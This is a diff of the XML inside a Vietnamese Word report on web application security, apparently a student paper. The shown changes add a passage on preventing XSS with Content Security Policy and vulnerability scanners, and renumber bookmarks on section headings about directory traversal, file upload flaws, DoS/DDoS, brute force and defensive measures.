+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"NCIFzN3K","properties":{"formattedCitation":"[20]","plainCitation":"[20]","noteIndex":0},"citationItems":[{"id":160,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/CLASVWYY"],"itemData":{"id":160,"type":"webpage","abstract":"Khám phá về kỹ thuật tấn công XSS và những cách hiệu quả để ngăn chặn. Tìm hiểu về nguyên tắc, cách thức tấn công và các biện pháp bảo vệ để bảo vệ ứng dụng web khỏi cuộc tấn công nguy hiểm này.","language":"en","title":"Kỹ Thuật Tấn Công XSS và Cách Ngăn Chặn - Viblo","URL":"https://viblo.asia/p/ky-thuat-tan-cong-xss-va-cach-ngan-chan-YWOZr0Py5Q0","accessed":{"date-parts":[["2025",10,5]]},"issued":{"date-parts":[["2018",6,24]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[20]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Việc s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ử </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>dụn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">g content security policy (csp) sẽ giúp ngăn chặn hiệu quả hơn qua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">chính sách bảo mật nội dung </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>(CSP) là một lớp bảo mật bổ sung mạnh mẽ, giúp ngăn chặn việc thực thi các mã độ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">c. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>CSP cho phép máy chủ web chỉ định những nguồn nội dung nào (script, CSS, hình ảnh) được phép tải và thực thi trên trang, chặn việc tải các script từ các nguồn không được phép (như máy chủ của kẻ tấ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n công).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ử dụng công cụ quét lỗ hổ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ng cũng là một phương pháp không kém phần hiệu quả. Việc t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>hường xuyên sử dụng các công cụ quét lỗ hổng ứng dụng web chuyên dụng (ví dụ: Burp Suite, OWASP ZAP, Acunetix) để tự động hóa quá trình kiểm tra và phát hiện các lỗ hổ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ng XSS trên website có thể</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> giúp khắc phục kịp thờ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>i lỗ hổng XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"6M3aYkPk","properties":{"formattedCitation":"[19]","plainCitation":"[19]","noteIndex":0},"citationItems":[{"id":162,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/E54CCR6G"],"itemData":{"id":162,"type":"webpage","abstract":"XSS (Cross-Site Scripting) hay tấn công chéo trang, là lỗ hổng bảo mật trong các ứng dụng web, kẻ tấn cống có thể chèn mã độc (thường là JavaScript) vào các trang web này","container-title":"viettelidc.com.vn","language":"vi_VN","title":"XSS là gì? Cách kiểm tra và ngăn chặn tấn công hiệu quả","title-short":"XSS là gì?","URL":"https://viettelidc.com.vn/tin-tuc/xss-la-gi-cach-kiem-tra-va-ngan-chan","author":[{"family":"IDC","given":"Viettel"}],"accessed":{"date-parts":[["2025",10,5]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[19]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19447,7 +24694,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="21" w:name="_Toc208343453"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc208343453"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19458,7 +24705,7 @@
         </w:rPr>
         <w:t>Tấn công Directory Traversal và File Inclusion</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19480,7 +24727,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc208343454"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc208343454"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19503,7 +24750,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> và phân loại</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19526,7 +24773,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc208343455"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc208343455"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19539,7 +24786,7 @@
         </w:rPr>
         <w:t>Hậu quả</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="21"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19582,7 +24829,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="24" w:name="_Toc208343456"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc208343456"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19593,7 +24840,7 @@
         </w:rPr>
         <w:t>Lỗ hổng tải lên tệp (File Upload Vulnerability)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19614,7 +24861,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc208343457"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc208343457"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19626,7 +24873,7 @@
         </w:rPr>
         <w:t>Nguyên nhân và cách thức khai thác</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19649,7 +24896,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc208343458"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc208343458"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19662,7 +24909,7 @@
         </w:rPr>
         <w:t>Hậu quả</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19693,7 +24940,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="27" w:name="_Toc208343459"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc208343459"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19704,7 +24951,7 @@
         </w:rPr>
         <w:t>Tấn công từ chối dịch vụ (DoS/DDoS)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="25"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19736,7 +24983,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc208343460"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc208343460"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19748,7 +24995,7 @@
         </w:rPr>
         <w:t>Phân biệt DoS và DDoS</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19771,7 +25018,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc208343461"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc208343461"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19784,7 +25031,7 @@
         </w:rPr>
         <w:t>Các dạng tấn công theo lớp</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19807,7 +25054,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="30" w:name="_Toc208343462"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc208343462"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19832,7 +25079,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> và các case study nổi tiếng</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="30"/>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19861,9 +25108,10 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="31" w:name="_Toc208343463"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc208343463"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19874,7 +25122,7 @@
         </w:rPr>
         <w:t>Tấn công dò mật khẩu (Brute-Force Attack)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="31"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19896,7 +25144,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc208343464"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc208343464"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19908,7 +25156,7 @@
         </w:rPr>
         <w:t>Cơ chế hoạt động và các biến thể</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="32"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19931,7 +25179,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc208343465"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc208343465"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19944,7 +25192,7 @@
         </w:rPr>
         <w:t>Hậu quả và các công cụ tấn công</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="33"/>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19978,7 +25226,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc208343466"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc208343466"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19989,7 +25237,7 @@
         </w:rPr>
         <w:t>BIỆN PHÁP PHÒNG CHỐNG VÀ BẢO VỆ</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="34"/>
+      <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20020,7 +25268,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="35" w:name="_Toc208343467"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc208343467"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20041,7 +25289,7 @@
         </w:rPr>
         <w:t>chống ở cấp độ Ứng dụng</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="35"/>
+      <w:bookmarkEnd w:id="33"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20086,7 +25334,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="_Toc208343468"/>
+      <w:bookmarkStart w:id="34" w:name="_Toc208343468"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20099,7 +25347,7 @@
         </w:rPr>
         <w:t>Tiểu mục cấp 3</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkEnd w:id="34"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20120,7 +25368,6 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Nội dung của tiểu mục cấp 3</w:t>
       </w:r>
     </w:p>
@@ -20143,7 +25390,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc208343469"/>
+      <w:bookmarkStart w:id="35" w:name="_Toc208343469"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20154,7 +25401,7 @@
         </w:rPr>
         <w:t>Tiểu mục cấp 4</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="37"/>
+      <w:bookmarkEnd w:id="35"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20207,7 +25454,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="38" w:name="_Toc208343470"/>
+      <w:bookmarkStart w:id="36" w:name="_Toc208343470"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20228,7 +25475,7 @@
         </w:rPr>
         <w:t>chống ở cấp độ Hạ tầng</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkEnd w:id="36"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20250,7 +25497,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="_Toc208343471"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc208343471"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20262,7 +25509,7 @@
         </w:rPr>
         <w:t>Tường lửa Ứng dụng Web (WAF)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="39"/>
+      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20284,7 +25531,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="_Toc208343472"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc208343472"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20296,7 +25543,7 @@
         </w:rPr>
         <w:t>Các giải pháp chống DDoS</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="40"/>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20327,7 +25574,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="41" w:name="_Toc208343473"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc208343473"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20348,7 +25595,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> toàn cho Tài khoản và Quản trị</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="41"/>
+      <w:bookmarkEnd w:id="39"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20386,7 +25633,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="_Toc208343474"/>
+      <w:bookmarkStart w:id="40" w:name="_Toc208343474"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20397,7 +25644,7 @@
         </w:rPr>
         <w:t>THỰC HÀNH VÀ ĐÁNH GIÁ BẢO MẬT</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="42"/>
+      <w:bookmarkEnd w:id="40"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20428,7 +25675,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="43" w:name="_Toc208343475"/>
+      <w:bookmarkStart w:id="41" w:name="_Toc208343475"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20449,7 +25696,7 @@
         </w:rPr>
         <w:t>thiệu về Kiểm thử Xâm nhập (Pentesting)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="43"/>
+      <w:bookmarkEnd w:id="41"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20494,7 +25741,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="_Toc208343476"/>
+      <w:bookmarkStart w:id="42" w:name="_Toc208343476"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20507,7 +25754,7 @@
         </w:rPr>
         <w:t>Tiểu mục cấp 3</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="44"/>
+      <w:bookmarkEnd w:id="42"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20550,7 +25797,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="45" w:name="_Toc208343477"/>
+      <w:bookmarkStart w:id="43" w:name="_Toc208343477"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20561,7 +25808,7 @@
         </w:rPr>
         <w:t>Tiểu mục cấp 4</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="45"/>
+      <w:bookmarkEnd w:id="43"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20614,7 +25861,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="46" w:name="_Toc208343478"/>
+      <w:bookmarkStart w:id="44" w:name="_Toc208343478"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20625,7 +25872,7 @@
         </w:rPr>
         <w:t>Các công cụ và môi trường thực hành</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="46"/>
+      <w:bookmarkEnd w:id="44"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20656,7 +25903,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="47" w:name="_Toc208343479"/>
+      <w:bookmarkStart w:id="45" w:name="_Toc208343479"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20667,7 +25914,7 @@
         </w:rPr>
         <w:t>Mô phỏng các bước thực hiện demo</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="47"/>
+      <w:bookmarkEnd w:id="45"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20734,6 +25981,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Góp ý về  môn học</w:t>
       </w:r>
       <w:r>
@@ -20768,7 +26016,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="48" w:name="_Toc208343480"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc208343480"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20780,7 +26028,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>TÀI LIỆU THAM KHẢO</w:t>
       </w:r>
